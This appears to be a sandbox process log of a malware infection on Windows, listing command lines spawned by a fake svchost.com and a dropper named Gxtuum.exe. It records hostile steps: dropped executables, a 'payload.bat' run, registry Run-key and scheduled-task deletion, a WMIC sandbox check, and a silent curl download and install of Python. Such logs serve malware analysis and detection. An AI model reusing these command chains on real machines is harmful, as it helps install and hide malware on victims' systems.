"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\2578412766.exe

C:\Users\Admin\AppData\Local\Temp\2578412766.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE

C:\Users\Admin\sysnldcvmr.exe

C:\Users\Admin\sysnldcvmr.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\513022960.exe

C:\Users\Admin\AppData\Local\Temp\513022960.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Windows\SysWOW64\reg.exe

reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /delete /f /tn Windows Upgrade Manager

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\287511317.exe

C:\Users\Admin\AppData\Local\Temp\287511317.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\154057176.exe

C:\Users\Admin\AppData\Local\Temp\154057176.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\test11.exe"

C:\Users\Admin\AppData\Local\Temp\Files\test11.exe

C:\Users\Admin\AppData\Local\Temp\Files\test11.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"

C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe

C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"

C:\Users\Admin\AppData\Local\Temp\Files\loader.exe

C:\Users\Admin\AppData\Local\Temp\Files\loader.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "payload.bat"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_PointingDevice get PNPDeviceID /value

C:\Windows\system32\find.exe

find "PNPDeviceID"

C:\Windows\system32\curl.exe

curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\520429473.exe

C:\Users\Admin\AppData\Local\Temp\520429473.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /k copy Emotions Emotions.cmd & Emotions.cmd & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3980 -ip 3980

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 332

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe

python-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe

"C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=572 -burn.filehandle.self=724 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe

"C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{DD8DBF4A-4DF9-4D20-A26B-E7B742651D29} {5C8DA92E-CA20-43A2-9F21-ED3F3CF16F12} 3244

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

